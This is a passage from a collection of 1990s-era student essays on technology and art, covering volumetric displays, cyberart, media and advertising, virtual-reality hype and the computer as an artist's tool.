be generated in real time. Their +field of view is fundamentally limited, and these displays +typically change their characteristics with the angle from which +they are viewed." As an alternative, Texas Instruments has +produced its Omniview device that allows the display of volumes +in volumetric space. +Until recently, 3D images have only been displayed on two +dimensional CRTs and have required the inclusion of standard +perspective cues such as shadows, texture gradients, and relative +size comparisons. Stereo 3D systems have relied on the use of +special glasses to simulate surface depth but could not allow +movement around a three dimensional object. VVD displays use a +rotating disk that fills the display volume, creating a surface +point at any location in a half-round ball space. Then by using +laser beams directed by X, Y, & Z computer controllers, images +can be projected to any point in the volume. The concept is +similar to the pictures drawn at laser shows but here 3 beams are +used. +A 36 inch diameter version has been built but a 10 foot diameter +model is feasible. A viewer can circle the display sphere and +see a three dimensional object from all directions while it moves +in real time. The display's resolution can be changed to any +desired value by redirecting the scanning system to overlap +points. VVD resolution is expressed in voxels (vo lume pi +xels). Early prototypes had 12,000 voxels, while current models +display 70,000. Three lasers of different colours can provide a +three-colour image or they can be mixed to provide a full colour +palette. Presently, VVD systems require powerful computers to +calculate 3D display data. Originally developed for the U.S. +Department of Defense this technology's future will probably be +more applicable to non military purposes. +Proposed applications include air traffic control visualization. +Air traffic controllers could look into the sphere and see the +exact location, continuous movement and distance relationship +between circling airplanes. Pointing to a plane with a laser +beam would bring up its information on the computer screen. +Other uses include medical diagnosis, weather pattern analysis, +and remote control of space station docking. Visual artists +could use this system to pre visualize sculpture projects, for +choreography and to output 3D animation sequences. + +The use of more conventional output devices will increase to +materialize images and objects designed in the abstract world of +the computer. CNC (Computer Numerical Control) equipment +designed for the metal production industry and XY plotters can be +used to cut out images in wood, vinyl, metal, or fabric. Three +dimensional milling machines can materialize objects for +sculpture and 3D animation. +Existing 3D works and artifacts can be digitized, stored, and +recreated in many different locations. Unlimited serial editions +of 3D work could become more popular. +The production of two dimensional works, including print +publishing have created a need for the service bureau that +specializes in outputting files for the artist and publisher. +Future service bureaus will expand their systems to cover video, +3D media, and large-scale 2D imaging. Since specialized +equipment is required to materialize creative ideas, the artist +will more often be forced to conceive and work on his ideas in +the realm of the abstract. In many cases the artist will only +see the final completion of his work after sending the files to +the "Service Bureau". + +The total extent of cyberspace integration is still to be +determined. Presently thousands of computers are connected +through various networks such as the Internet, private commercial +systems, open commercial systems, and hacker systems like +FidoNet. Although most are platform independent there are still +fairly narrow constraints on the type of data exchanged. There +are parallel communications systems like land telemetry networks +that monitor geological conditions, traffic movement, electrical +power transmission, radar information and satellites that handle +telecommunications and video signals. +As more and more communications move away from the analog to the +digital world as high definition television is soon expected to +do the more integration of signals will occur. It is interesting +to consider that a computer could order extra oxygen supplies +from Missouri when its sensors determine a high level of air +pollution in Los Angeles. Or that stock market futures price of +grain would change after a computer analyzed infrared images of +world crops. +Artists might consider interactive works that are affected by +natural forces, commercial activity, or combinations of +conditions sensed by cyberlinks. + +The networks will become a great source of ideas, feedback, and +will present opportunities for collaboration. Art created for a +world culture will need more than an North American perspective. +A description of a Russian created program El-Fish states that +"Russian programmers couldn't write successful accounting +programs because they don't know about western business +culture...but their culture developed sensibilities that combined +beauty and non-utility". Artistic teams from different parts of +the world can co-operate to create the best cultural products for +a world audience. + +As the digital bit becomes the standard building block for all +information we will have greater interchangablity and +interconnectivity. Nicholas Negroponte states that "all +information providers will be in a common business - the bit +radiation business - not radio, TV, magazines or newspapers". +Advantages include being able to quickly construct many specific +versions of a production and the non-material storage of +products. Large numbers of books no longer have to auditioned +because of the advent of print-on-demand printing systems. Many +constructed realities will possibly only exist in digital form. + +Unfortunately we may also develop creative techniques in one +digital medium and simply apply them to others, maybe +inappropriately. A music sequencer program allows you to +Quantize while a photo manipulation program allows you to +Equalize. They both use a common root technique of normalizing +but specific digital manipulation concepts might not have +universal application. However, is there expanded creativity in +doing musical things to pictures and visa versa? + +The enthusiasm for the digital domain does have some detractors. +Analog constructions do have specific qualities that are +aesthetically pleasing. They might not be able to be justified +technically but certain nuances inherent in analog +interpretations are artistically valid. Chemical imaging systems +still create movies that are more pleasing to the eye. Tube +amplifiers create a unique sound that can't really be duplicated +by digital sound. As in other transitions we will loose some +important characteristics and abilities when we adopt new +technologies. + +The cyberworld and computer created information obviously have +their own language. Marshal McLuhan was convinced that the +medium is really the message. Although content is significant +when evaluating a short term experience, the inherent qualities +of a medium are really what constitutes the overall message. TV +really communicates passivity and mass conformity. The message +of cyberspace is still being considered. The technical language +of the cyberspace system is still in a tyrannical realm of linear +text. Totally unforgiving of errors in letters & case it exerts +a blind totalitarian control over the mechanics or structure of +the system. However, the highly defined structure of the system +opens an anarchic realm of interrelationships and interactions of +possibilities. +Perhaps the key distinguishing characteristic of the cyberworld +is interactively. Users of the Internet are able to make more +conscious choices about the information they receive, they can +gather data into their own local electronic spheres, and they can +interact with other users & information providers. We can assume +that one message from cyberspace is activity rather than +passivity. Coach potato mode will not work with a cyberspace +screen. + +Art has generally catered to the passive viewer. Although modern +art has incorporated participatory elements and some interactive +schemes most of the ideas are expressed in a one-way +communications mode. Art galleries create interaction or choice +by having patrons physically move from one location or art work +to another. In most cases the cyberart will be presented to the +viewer at his/her location. Instead of a nail on a wall, the +computer will be a much more sophisticated display system. The +digital nature of art will allow the viewer, if he so desires, to +alter the artist s work, to appropriate it or to simply reject it +by destroying the electronic file. + +The visual style of cyberart often follows the myriad of choices +the system provides. A complex system creates complex imagery. +Interactive CD s offer menu screens with dozens of preview +images. Text is supported by images. Images are augmented with +text. Sound is added to business communications and moving image +segments like QuickTime files are attached to technical reports. +Ideas are expressed through layering several modes of expression. +Pedagogical theory has always supported multi-modal +communications and now we have the technology to accomplish it. +In addition to painting, photography or sculpture, media such as +MacroMind Director, Hypercard, electronic games, CD-I, 3D0 and +virtual reality systems may be relevant choices for artists. The +future expression of ideas will require a layered, multi-modal +strategy that elaborates and gives the user choices and the +opportunity to participate. Simple two-dimensional images may +have difficulty finding a place in cyberspace. + +The plastic arts have referred to traditional sources for their +theory and inspiration. Modernism embraced Marxism while Post +Modernism welcomes Neitzche back. The cyberpunks have created +their own set of philosophers, all of which are found in the +Science Fiction section of the library. Asimov, Pohl, Arthur C. +Clark and Robert Heinlein are some. "If Marvin Minsky had his +way, there would always be a visiting science fiction writer in +residence at the Media Lab." Will the artist who chooses to work +in the Cybersphere have to pay closer attention to science +fiction to better understand its roots? Can Marx and Azimov +co-exist? + +How involved should artists become in the technology of the +cyberspace? In the past many artists have been content to have a +technician organize the technical processes of art production. +Although the artist may not have had the technical skill to +complete the task he usually understood the process as it related +to his artistic needs. However, to participate in the cyberspace +community it may demand a greater level of technical commitment. +Alan Kay pointed out that the computer is not a medium but rather +a meta-medium. In other words, with a computer you can create +media. +Artists have previously been in the habit of simply adopting the +materials and tools created by engineers and the industrial +production system. MIT's MediaMoo is a good example of a +cyberspace reality that is being created through technical +knowledge, interest from a wide range of "characters", social +interaction, and some artistry. Future virtual realities will +require equal amounts artistic and technical input. It will be +most effective if artists can express their artistry through a +strong understanding of technology. In fact, artists will be +excluded from many potential interesting environments if they do +not develop the technical skills to communicate in the new +electronic world. + +Jaron Lanier says that we can use "post-symbolic" communication +to create shared realities. A virtual reality system will +create a beach when we say: "Let's go for a swim". Instead of +using symbols to describe the beach, we create an electronic +version of a real beach. +Symbolism, which is the key to semiotic interpretations of our +culture may find new roles in visual communication. Whenever we +use a system that constructs new realities, then the established +cultural symbols or icons, which are short cuts to perception, +may become pass or boring. Any reference to past cultural +symbols would immediately signify fantasy. Artists will have to +look past much of our visual and semiotic heritage to construct +credible virtual worlds. + +Computers, networks, and the machines that they exchange +information with are multiplying at an incredible rate. They are +constructing a new set of possibilities and destroying others. +The traditional artist who is interested in entering the +cyberworld will have to make many changes. The creative +environment is abstract and dematerialized. Your ideas will be +neatly reconstructed into uniform bits ready to be radiated +throughout the system. +Although you will have many opportunities to distribute your work +around the world it will not receive the hallowed treatment +reserved for gallery exhibitions. It will compete freely with +countless images, interactive programs, video, digitized audio, +games, and people. + +You will start to read science fiction. You will try to find the +best service bureau to make hard copies your photos, graphics, +and sculpture projects. You will find creative partners in +Ethiopia. + +You will take up computer programming so that you can create new +real estate in a Florida MOO. You will drop sculpting and take +up MacroMind Director. You will forget about cultural symbols +and icons. You will save hard for a VVD display system. You +will not need expensive real estate because you can watch your +virtual reality beach. + + +---------------------------------------------------------------- + + + + +Chapter One - Media and Advertising + + + What is the role of technology in the media? The media has +traditionally been a way of conveying events ( political, +entertainment, human interest ) to the public at large. The +media is in the information business and relies heavily on +technology to transmit information from one place to another. +Today, we tend to think of technology with a sort of high - tech +this is so modern day attitude. That technology is the wave of +the future is evident but it is important to recognize that +technology is also a part of our past, and understand the +relationships between past technology with that of today. +Technology was the wave of the future thousands of years ago, +technology is like another word for progress, synonymous with +advancement or moving forward in time, technology is the newest +and the latest and is a habitual quest of mankind to increase +his/her capabilities in his/her environment. Domestication of +crops was technology, what about fire - the greatest invention of +all? Technology has always been a driving force in the history of +the human race and with technology a desire for communication is +also deeply rooted in our collective heritage. People have made +illustrations and created writing systems to communicate and +document their histories. Language was also created for smoother +communication and has become increasingly complex. As the world +has increased so has it s level of communication. The media as we +know it largely developed in the wake of modern technology. +Before radio, telegraphs, planes and trains, the world relayed +events to other parts of the world through human travellers and +by letter which would have gone by carriage or boat. With the +radio, events of significance (for whatever reason) could be +broadcast worldwide within a few short hours. With the invention +of planes came aerial warfare and the real possibility that a +country thousands of miles away had the practical means of +invasion and conquest of your own homeland. Enter: the media. +People then and now relied on the media, the radio, the telegraph +and later their television to receive information they now +considered critical to their existence. Out of newspaper +advertising developed radio and later T.V. commercials - the +point at which media and advertising became inexplicably and +forever linked in popular culture. So where does that leave the +media in the modern world? Should the media have to maintain a +moral responsibility to the public? What are the attitudes of the +public to the media? How many people are unaware of the biases +and often self - serving motives that are prevalent in media or +newsgroups today? The resources that the media have been able to +utilize in the twentieth century have changed the face of +advertising indefinitely, and unfortunately deception is +unavoidable.At this point in time many people are still unaware +of the resources available to the media and because of this +widespread ignorance are oblivious to the manipulation of their +minds and psyche by powerful mega-bucks-money-hungry +manufacturers and corporations. An excellent example of this +mindless manipulation in advertising where technology has been +utilized would be photo - manipulation or perhaps plastic +surgery. Combined, the use of these two areas in conjunction with +advertising are one the leading contributors in the continuing +lack of self - esteem of women in North America. The widespread +image of the idealized woman is often created through technology +: elaborate and painstaking make -up, photo manipulation through +lighting, airbrushing, touch ups, varied films and high contrast +filters; these can all be used to create a false image - one +which is unfortunately high sought after and is in most cases +unattainable. The cause of this disastrous situation cannot be +blamed on the high - tech features that are available in present +day, aerial warfare cannot be blamed on the invention of planes. +People so often place the blame of an unfortunate situation on +technology because it is crucial to the existence of the +situation - the situation is dependant on the invention; it is +human nature that develops and determines the course an +advancement in technology will take. + + +Chapter Two - Interconnectedness + + As technology increases, communication also increases and with +these increases follows a sense of interconnection. Connectedness +should be the opposite of isolation, but they are, in some ways +very closely related. I will show this relationship as it exists +in a narrative; a day in the life of a fictitious character - Mr. +TypaLot. + + + A Day in the Life of Mr. Typalot + by b. bigelow + + + + Mr. Typalot lives in the suburbs of Vancouver, in Delta, B.C. +He lives in nice home in a prestigious area with his wife and 2.2 +children. He works in the city, and has to commute each today. He +leaves his house at 7:40 every morning to make the commute to +Vancouver. He takes his briefcase (laptop computer inside), his +cellular phone, and a mug of fresh, automatic-machine-made +coffee. His commute though lengthy, goes quickly because he +spends much of his time talking on the phone (usually to other +colleagues also on their way to work).Mr. Typalot is perhaps a +researcher, an advertising executive, or maybe a systems analyst. +He types a lot, mostly into his Unix at work, his laptop, or at +his Macintosh in his den at home. When he isn t typing, he is +talking, sometimes on a telephone, sometimes not. Mr. Typalot +communicates with people all over the world everyday via. e - +mail, fax, phone and answering machines, and through virtual +reality set-ups such as MediaMOO. He develops all kinds of +relationships with people in the course of his day, but he is +also everyday increasing his relationship with inaminate devices. +It can not be avoided, in his relationship building with other +people it is necessary for him to interact with machines - it is +a necessity of his success in the workplace. Mr. Typalot is +isolated in a indirect way everyday. Each day for several hours +he is deprived of any sensory stimulation that is not available +to him through his terminal or workstation. Mr, Typalot is +experiencing sensory isolation. + The narrative of Mr. Typalot is a generic example of what many +people in the workplace experience. Mr. Typalot is perhaps more +extreme than the norm but as communications in technology +advance, more and more people will have workdays that fit this +description. This type of connectedness or advanced communication +has ups as well as downs - the downside involves a lack of +direct, or face-to-face contact, and a loss of the more human +side or traditional interaction between people. On the up side, +is the opportunity to engage in a virtual reality experience; to +participate in a highly imaginative and creative realm which I +could only previously describe as becoming deeply involved with a +very intensely written novel. These text based virtual realities, +such as MediaMoo are highly creative and intellectually +stimulating - as well as fun. They can be a good alternative to +traditional reading because the player can actually participate +and contribute to the story . Virtual Realities might ce +beneficial in educating children and adults - making learning +enjoyable and interesting. They might also contribute to a higher +self esteem in children/teenagers as they maintain some type of +control, responsibility, and exercise their ability to produce. +On the other hand, V.R.s could be less than beneficial to some +individuals as they might become more drawn into the V.R. than +might be perceived as healthy. I sometimes envision a situation +similar to the Dungeon and Dragon scenario where in several cases +the individuals involved with the game had a difficult time +distinguishing between real life and fantasy . The bottom line +is that each individual is different and will react to virtual +realities in their own way; that a few select cases cannot +determine the outcome of thousands of others. + + + + +Chapter Two - Interconnectiveness + +Part Two - The Role of Technology in the Lives of Special Needs +People. + + + Technology can go along way in contributing to the quality of +lifestyle in the lives of those with special needs. For the +deaf, the computer can be a fabulous way of communicating and +reaching out to others. Autistic people who at times may have +difficulty interacting with other people often are very skilled, +and enjoy working at a computer workstation. People confined to +a wheelchair have many more career opportunities than ever +before thanks to the computer and a continuing growth of more +sophisticated software. In the instance of a brother of a friend +mine ( we ll call him Jim), the computer has literally been his +salvation. After a severe car accident, Jim lost the movement of +both legs - he will be confined to a wheelchair for the rest of +his life. Jim comes from a family of artists and before his +accident he was a working artist painting in a traditional +sense. Now Jim works with computer graphics - doing freelance and +contract work. New software has made it easier, and more +convenient for people like Jim to continue working. There are +many fields to work in , ie. research, data entry, etc. In the +case of special needs children - those with learning disabilities +or the developmentally delayed; a constant stimulus is one of the +most important factors in the mental ( and physical) development. +Traditionally, this constant stimulus has been provided by +support workers, but lack of funding ( gov t and private) often +leads to special needs children not receiving the one on one +stimulus they need and deserve. While the computer might not be +considered an adequate substitute for human stimulus, it would +still be better than nothing and would probably make a positive +contribution to the development of the child. Children are drawn +to computers - to the bright colors, movement and sound emote +from them. Unlike television, computers can be more interactive +and will encourage and prompt a child to participate. I don t +know where computer stimulus will lead, but certainly it is +better for the intellectual growth - and even motor skills than +most of the programs children watch on T.V. The same can be +applied to special needs adults, for while these individuals are +in the body of an adult, often their intellectual development +hasn t caught up - has been delayed in some way and stimulus and +prompts are still essential to their intellectual growth. + + +Chapter Three - Technology and Tradition + +Part One: Technology and Tradition + + + The increases in technology have made communicating in the +twentieth century easier and more convenient than ever before. +Electronic mail, faxes, cellular phones and virtual realities +drastically reduce the amount of time it takes to get a +message/or important documents to an individual. Electronic mail +takes away the envelope, the stamp and the whole structure of the +traditional mail system. There is no pick, transporting the +letter to a sortation plant and sorting of the letter before the +eventual delivery ( of which won,t be in the recipient s hands +until he/she gets home from work,etc. E -mail is practical, but +will eventually eliminate a characteristic of the weekday as many +people experience it. Coming home to an unexpected card or letter +is a pleasant surprise which would be virtually eliminated in an +electronic mail system. Letters or cards would probably be +received at work in the course of the day, and would be on a +screen - not paper. Paper cards,invitations etc. might still be +sent out (perhaps by private,entrepreunial companies) as a sort +of novelty or maybe on a special occasion. What about wedding +invitations and gold embossed papers? How could one put a wedding +invitation into a photo album if the invitation was on the +screen? ( I guess you could always print out a copy). These small +characteristics of everyday life will probably in the future be +altered to fit into a world where modern technology has spread +into every aspect of our existence. Are there areas that the +notions of convenience and practicality should not enter into? +Areas of our lives that are considered sacred and should be +protected and preserved from the invasion of the driving force +called technology? + + + +Chapter Three - Technology and Tradition + +Part Two: Technology in the Home. + + + Technology has always affected the home. The Refrigator, +electronic oven, and electrical lighting are a far cry from a gas +lamp illuminated kitchen and a wood burning stove. + The washer and dryer, disposable diapers and running water have +freed up plenty of time for more enjoyable pursuits like going +for walks or visiting friends but in many instances just +listening to the radio or watching television. We are surrounded +by technology always - modern techno conveniences such as the +telephone (portable,cellular, or other) the microwave, toasters, +coffee makers, VCRS and camcorders. The computer will have more +impact in the home than any other techno convenience since the +television.( or Nintendo). The computer will contribute both to +the organization and the entertainment/leisure activities in the +home -catapulting into a nucleic role which the household could +quite possibly revolve around in the future. Through the computer +a family, individual, etc. could have access to more information +than they could ever hope to tread upon - never mind absorption. +Miscellaneous tasks and activities such as going out to get a +newspaper, borrow a book from the library,get a video or play +arcade games could be fulfilled by simply sitting in front of +keyboard and screen. It is hard to predict what the outcome of +discontinuing traditional activity might be - or if it will +happen at all. The potential is real and the outcome might be +disastrous. Even a general recognmition by society to admit and +understand this;that the computer in the home and workplace is +potentially harmful to our continued existence, might go a long +way in preserving whatever integrity we have left. + +Chapter Four - Art and Architecture: The Role of Technology + + + There is a big difference between computer generated art and +art that exists solely in the computer. Computer generated art +can still be accessed in the traditional way, it can hang on your +walls at home - it can be displayed in a gallery or reproduced +in a book.In this way the art is not dependant on the computer +for it's existence - it can retain an identity seperate from the +computer. In these instances the computer is like a tool the +artist has used to create his/her work, just like a camera, or a +tablesaw. With art that exists solely within the computer, the +images can only be viewed via the computer and nowhere else. It +is a permanent attachment to the piece and it is therefore an +integral element of the work itself. This type of art is +different from traditional art or even independant computer +generated art because it's focus or motives are related to +communications in a different way - an area of communications +which is void of the physical and tangible.This difficult concept +of relaying ideas and information can be thought of as a large +base of information, compiled of the thoughts and interests of +thousands of people. + + What is the role of the artist within this base of information, +and how will the role of the artist change as a result of +technology? Who is the artist? The artist is foremost a designer; +a person who conceives ideas and then attempts to communicate +those ideas (sometimes to themselves and sometimes to others)by +representing the ideas in a physical expression. What the +expression will be depends on the the designer. If the designer +is a musician the expression might be a musical score, if the +designer is an architect than probably a building plan. There +are several advantages to working within a large information base +that over a 100 000 000 million people have access to ( ie. the +Internet).The exposure is tremendous and the opportunity to make +contacts and to to relay ideas is anyone's speculation. The +electronic art gallery is to the artist today what television +would have been to the actor who was previously only viewed in +live theater. In presenting to the masses through an electronic +network an expression of an idea the artist is able to convey and +communicate thoughts on a widespread level - but to what level of +efficiency? Is something lost in the philosophy if the artist is +able to communicate the the idea to a broad audience but only in +general terms? Is it better to communicate a fuller understanding +of a concept to a limited people instead of a general idea to +thousands? This question can only be answered by the individual - +each artist having their personal agenda which dictates their +actions and motivates their work. + + It is up to us, the designers and artists to determine and +shape our changing role along with the advancement of technology. +What else can we do? We are forced to go with the flow and +utilize technology to prevent our obsolescence. Technology and +job displacement go hand in hand and the artist and designer are +not an exception. With more and more sophisticated software many +kinds of work in the design industry could easily be sifted out +in the future. Graphic artists, architects, industrial designers +could in all like likelihood be eliminated in future society. +Think of past tradesmen (tradesperson) who no longer have a place +in the world due to technological advancement and new invention? +How many shoemakers have you met recently? The shoemaker was a +tradesman - a designer of a kind and is a scarcity in modern day. +Of course the machine made/pre-fab shoes can never match the +quality of a leather shoe cut and measured specifically to the +individual's foot. One of a kind shoes- each with their own +identity; a product and design from start to finish of the +individual designer and his/her original vision. The fact is if +it is good enough, if it will get the job done (at least +satisfactorally) then it will be accepted by the masses;leaving +little room for the creativity and ingenuity of the individual +designer. A balance needs to be struck between designer and +computer - a blance where the computer is a tool for the designer +and not the designer itself. Architects and draftspeople now have +the unique advantage of being able to conjure up their changing +visions quicker than they could possible recreate an intricate +drawing by hand.These quickly redrawn views however, only remain +an advantage to the architect etc. if the designer is still the +motivating factor behind the design and is the major contributor +to the end result. + + +---------------------------------------------------------------- + + + Preinventing the Wheel + + Have you had enough of magazine articles and other essays +whose titles play on the word "virtual?" Articles with names like +"Virtual Virtuoso" or " Virtually now" or "Virtigo." I thought as +much. Virtual reality is getting very tired, and it doesn't even +exist yet. It has been able to avoid fading out of public view +for this long because of its' name, which sounds sufficiently +official, and at the same time vague enough to allow its' use in +context with anything one thinks is neat-o. In the forties, there +was a similar craze for things whose existence was in question, +and it also had a misleading name that made people sound clever. +That name is Existentialism, and before it became popular, it +actually meant something. But it was only taken seriously after a +couple hundred people who hadn't bothered to find out its' +meaning were put in situations where they had to pretend that +they had- hey, presto- 200 false definitions! This confusion is +happening to virtual reality, only not so romantically as it did +in post-war France. A few months ago I had dinner with a good +friend. As we ate he asked me to explain to him what the whole +deal on virtual reality is and I told him, more or less, that it +is the idea of general purpose simulation, and went on to explain +that simulators of this sort need detectors to sense body motions +or speech, devices to stimulate our senses of sight, hearing, +touch, etc., and a computer to connect everything and vary the +interaction according to programs. Then I felt obliged to rehash +the monologue about the many possibilities of the potential +medium, and did, but my friend, who is an Economics major, just +laughed, "Is that all it is, a glorified video-game?! You +actually study that kind of stuff at school? I heard all this +talk on how important it is!" He had been impressed by the +virtual Paul Reveres, the virtual exaggerators, the virtual +newspaper columns with titles like this. It is truly a pity that +the term 'virtual reality' isn't used sparingly, and that 'the +study of simulation' or some like phrase doesn't get all the +attention. Simulators already exist. Because of all this hype, +virtual reality is being made to sound a lot more important than +it is. Virtual reality is being treated like some radical new +science. Ad agencies are cashing in on its' commerciality and +confusing the general population with the meaning of the term. +Fans of virtual reality are trying to convince people that its' +dawn is ridiculously near and thus that its' study is pertinent. +Other virtual reality enthusiasts are preaching that virtual +reality is "the way" and will end racial inequality and give the +repressed a voice. Just as preposterously, academics are solemnly +warning that virtual reality will create a nation of violent +thugs. Others warn of "virtual-reality addictions," seriously; +"virtual-reality addictions." It is sad that a promising +technology has been taken over before it has even reached a +concrete stage, by a bunch of clowns. + The driving forces behind virtual reality have been around +for all of human history so why is it considered such a radical +concept? When flight simulation programs started appearing a few +years ago for home computers, a lot of folks bought them (after +all, they were pretty neat) but few sat around yakking about how +those programs were "interactive" as though the word were a drop +from the fountain of profundity. Hell, even a pinball machine is +interactive. What about "Choose Your Own Adventure" books, the +books that let kids make a decision by picking one of two pages +every so often? What kind of novelty is there in trying to fake +the world around us: We started with cave paintings, then +sophisticated paints until we had realistic oils, then the still +photographic camera, the record player, motion pictures, talkies +and what could be more virtual than telephones; the technology +which Bell invented to allow an entire nation of people to +consider talking to banana-shaped objects on street corners a +normal part of life. Theatre is a form of virtual reality as +well. Some like to think that the V.R. will "enlarge our minds" +by making us more imaginative. As though we haven't now any +activities requiring imagination. V.R. is not the first; it is an +element of many games, from Chess through to Scruples. Of all the +things V.R. could be compared to, it is strange that one hears of +the similarities of V.R. and the telephone less often than V.R. +and narcotics. This is the kind of talk that makes V.R. out to be +larger than life. There is a difference between drug-use and +any-old-thing that happens to be bizarre and illogical. That is +why we as a species have been spared an addiction to the writings +of Marshall Macluan. V.R. is not a new concept. + Virtual reality is also kept well in the public eye by +advertising firms. These firms are resourceful enough to have +found a word associated with V.R. to advertise services or +products in a manner that will make them sound as though they are +on the cutting edge of technology, regardless of the truth. I +have already mentioned the word they use. The word is +"interactive" and it is plastered on everything from phone-sex, +to standard phone-in talk shows, to magazines and automobiles and +children's toys. It is generally assumed that inter-active is +entertaining but who of us really wants to leave our couch to +phone a television station half way through a program. People +watch television to relax. The same goes for reading, listening +to music and looking at pictures. Being interactive isn't all +that thrilling. One spends all one's life in an interactive +world. A lot of it even bores one. Being inter-active is not +necessarily being virtual. It would be kind if advertising +agencies would not try to convince us otherwise. No, we will have +to wait a few years for real reality-simulators. + How many years? "In the near future," is the standard +phrase. How near? The people who vigilantly claim that V.R. will +be perfected in the next ten years are generally the same people +who talk a lot about terra-forming Mars and making it habitable. +However true it may be that all geniuses are dreamers, it is not +true that all dreamers are geniuses. Some are only poor, +misguided Dr. Who fans. Let's just say it takes thirty years to +develop a graphics system that can display at 24 fps, with +photographic resolution, a stereoscopic alterable landscape- +which would take an insane amount of memory. We'll also say that +by that time we'll have the capability to transmit at real time +the colossal amount of data needed to hook a V.R. machine up to a +network. Then we'll assume (this is more reasonable) that we'll +have a perfectly light-weight, comfortable bodysuit that won't +make one look like a scuba-diver wearing a bicycle helmet. Hey, +they won't be available to everyone. They won't come cheap. It +will take a long while for virtual reality systems to made +compatible. It will be a while for a decent net to cover the +globe. But let's say that it will take around 50 years for V.R. +machines to become common household items. As loose as any figure +based on unprovable guesses must be, 50 years seems like a +reasonable number. What is all the excitement about then? No +current virtual reality- type products, from war games to +video-games, come near to giving a convincingly real feeling. +Just because virtual reality may be right around the corner +doesn't mean we'll see it next year. It's quite possible that +half of us will be dead by the time virtual reality amounts to +something. + Some people in these times hold the opinion that V.R. will +be a great social instrument. Sure, after Nintendo rolls a few +tens of thousands of Virtualboys off the assembly line everything +will be jolly. No more wars, no more intolerance. Neo-Nazi +Skinheads will plug in and suddenly turn into nice, decent +fellows and fall to their knees to beg forgiveness from the +minority groups they have been terrorizing an hour before. The +idea is that since people would have the ability to conceal their +identity while using a net we would all be tolerant and +understanding. This would be a compelling argument were it not +for the telephone which already allows us this service.If V.R. +evolves in a similar manner, it will end up with individuals +choosing only to contact close friends. And I know that's not +what the V.R. enthusiasts want. And I know they want it to be a +wild and crazy medium. But there are a lot of folks in the world. +Business people, for example, would get use out of V.R. by using +it for long-distance conferences or perhaps for models of +products, or real estate. They would not find it useful to +pretend to be a Virtual-prawn on the Cyberspace-Oceanfloor +Network. People could do a lot of things on V.R. networks, not +all of them brotherly. Thanks to V.R. it would be a lot easier +for racist people to form world-wide organizations.. they could +congregate daily if they chose. It is just about as likely that +V.R. will correct the world's problems as it is that a crumpet +will corrupt a swinging mallet. On the other hand V.R. will not +spell a return to the dark ages. + The idea is that someday children will be weaned on V. R. +sets. They will get used to regularly lopping off virtual heads +and so, when they grow older, they'll be conditioned, see, and +they'll go nuts and they'll lop off real peoples heads. No matter +how much you show people that there is no evidence to support the +claim that there is a correlation between violence in the media +and violence in real life they just don't learn. For once and for +all, violence in the media is a good thing because it teaches +children to distinguish between fact and fiction. And so long as +it remains possible to tell when you are "virtual" and when you +are real there is no problem. We will never create V.R. so +effective that it is exactly the same as real life, we will +always be able to notice something unrealistic about it, perhaps +the way things sound, maybe the quality of light, it would +certainly be virtually impossible to convincingly eat virtual +food or have a perfect sense of touch. + The most ridiculous overestimation of V.R. is that the whole +world will become obsessed with V.R. and abandon the outside +world forever. This is very poetic but unfortunately there are a +couple little problems with this theory. Like, for example, +eating. Or will V.R. be so amazing that people just won't get +hungry. Oh, there is also some difficulty in respect to paying +the hydro bill when you spend all of your time in V.R. and +therefore have no time to work. Most people for V.R. or against +V.R. tend to wildly exaggerate the importance of V.R. Remember +the stories there used to be about computers? The only people who +will ever be addicted to Virtual Reality already are, those are +the people like Commander Rick on Prisoners of Gravity, the kind +of fools who write poetry about "cyberspace." + Virtual reality does have a lot of potential; to take up +where the telephone leaves off, to amuse and entertain, to +design, and a whole lot more. What is annoying is to see history +endlessly rehashing itself. People have always exaggerated with +new inventions from film to space travel. It is ludicrous that +virtual reality is treated as such a unique, modern concept. It +has roots in the trend in Western culture since the Dark ages of +more and more realistic art and it has roots in the production of +various modern simulators. It is ridiculous the way ad agencies +through around the term "interactive," in order to confuse people +into associating it with virtual reality. It is ridiculous that +virtual reality is being talked about this much when it probably +won't take off until another half century. It is ridiculous to +attribute spectacular moral consequences to virtual reality, +either good or terrible. It is particularly silly to predict +slaves to entertainment when no such preposterous phenomena has +ever existed before. It is a field too easy to romanticize. It is +easy to think of all the possibilities, and easier to forget that +most of them will never be realized. Virtual reality is already a +fashion statement, an advertising ploy, a moral issue, and a +constant subject in magazines. With all the attention one would +think we were reinventing the wheel. + + +---------------------------------------------------------------- + + + Notes on the use of the computer in art. + by D. Venables + + + The computer is a tool, a fancy tool, but just a tool. In +the hands of a person who makes art, it can be used to make +art...the REAL kind of art. The pencil is a tool, a simple tool, +but just a tool. In the hands of a person who makes art, it can +be used to make art...the REAL kind of art. Perhaps if the +majority of the computer art we see is pretty dismal, it is +because the tool has not yet found the right hands. + + Contemporary culture and the place technology has in it. +A loaded statement. Contemporary culture "is" technology. At +least in our privileged neck of the woods. Taking this course +has been akin to the experience of buying a Volkswagen and then +noticing them wherever you go. I now see the use of computer +systems where I was once blind to them, in every facet of our +lives. A technology this pervasive must surely be adopted by the +artists among us. The avant-garde will never die. The +avant-garde will continually rear its unusual head where it's +least expected. It is the evidence of evolution, the flower on +the plant of science. + +(Even as late as dadaism, Marcel Duchamp noticed the relation of +the avant-garde to the practice of the consumer-that the product +of the avant-garde was to have the same characteristics of +planned obsolescence/mass production as the products of mass +consumption while simultaneously allowing the producer/artist to +register shock at being reduced to a machine.) Discussed in +Manfredo Tafuri, Architecture and Utopia: Design and Capitalist +Development (Cambridge, Mass.: MIT Press, 1976). + + Maybe notes on what art is (I guess we have to have some kind +of a definition before we can tell if computers can be a part of +it) would be in order. A discretionary and biased viewpoint +follows. + + After spending the last couple of years focusing entirely on +photography, I came into this course, wide-open, and ready for +new ideas, primed by a lecture by photographer Jeff Wall, who +showed a selection of his older work and also a couple of his +new pieces, done via computer graphics. This fired my +imagination. Little did I know at the time that Jeff was in the +habit of traveling to Los Angeles and renting the computer lab +there in Hollywood which has all the heavy artillery used in huge +special effects productions. The pieces he produced were of +high quality due to the level of the technology he was using, +although the work he had done could have been accomplished +through traditional photographic technique. + + Using "mind bicycles" for photography is advantageous in +that the cost to the environment is considerably less, ie. the +chemicals poured down the sink (and forgotten in a frenzy of +photographic creativity) make their way into the rivers, +oceans, air, animals and eventually back to us in some form or +another (perhaps while walking on the shore at midnight the +phosphorescence will suddenly, strangely, have you thinking of +Calvin Kline models). The immediate health of the artist is +threatened less during computer use than during the photographic +process as well. It is cleaner to use than almost any other art +material or tool. + + Thinking that a two month course was plenty of time in which +to master the art of photo-manipulation, I gaily traipsed into +class to make some art. + + + + +DEBBIES DEFINITION OF ART + + One of my definitions of art is, art as 